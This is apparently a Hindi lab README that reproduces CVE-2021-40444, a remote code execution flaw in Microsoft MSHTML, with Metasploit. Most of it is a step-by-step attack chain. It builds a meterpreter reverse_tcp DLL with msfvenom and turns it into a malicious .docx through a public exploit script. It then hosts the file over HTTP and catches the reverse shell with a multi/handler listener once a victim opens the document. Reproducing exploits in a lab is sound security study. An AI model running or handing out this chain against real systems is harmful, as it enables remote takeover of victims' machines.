
Microsoft MSHTML रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता को पुनरुत्पादित करने का एक प्रयास और Metasploit Framework का उपयोग करना।
मेटास्प्लॉइट फ्रेमवर्क का उपयोग करके Microsoft MSHTML रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता को पुन: उत्पन्न करने का एक प्रयास।
यदि FlareVM में नहीं चलाया जाए तो सबसे अच्छा काम करता है
रिपॉजिटरी को https://github.com/lockedbyte/CVE-2021-40444 से क्लोन करें
बाद में msfvenom के साथ उपयोग के लिए .dll टेम्पलेट तैयार करें
msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll
हाल ही में बनाए गए template.dll को रिपॉजिटरी के test/ फ़ोल्डर में कॉपी करें
template.dll को chmod +x template.dll द्वारा निष्पादन योग्य अनुमति दें
स्क्रिप्ट चलाएँ ताकि को में प्रोसेस किया जा सके
template.dlloutputpython3 exploit.py generate ~/test/template.dll http://<SOURCE IP>फिर दस्तावेज़ out/ फ़ोल्डर में निर्यात किया जाएगा और हम अपने HTTP पोर्ट (डिफ़ॉल्ट 80 है) पर एक लिसनर बना सकते हैं
python3 exploit.py host 80
मेटास्प्लॉइट को इसके साथ चलाएँ
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <SOURCE IP>
run
फिर हम document.docx को अपनी असुरक्षित मशीन पर भेज सकते हैं और .docx को निष्पादित कर सकते हैं
हमें exploit.py टर्मिनल में प्रतिक्रिया मिलेगी और यदि हम रिवर्स टीसीपी शेल उत्पन्न (स्पॉन) करने में सक्षम होते हैं, तो लैब सफल मानी जाती है।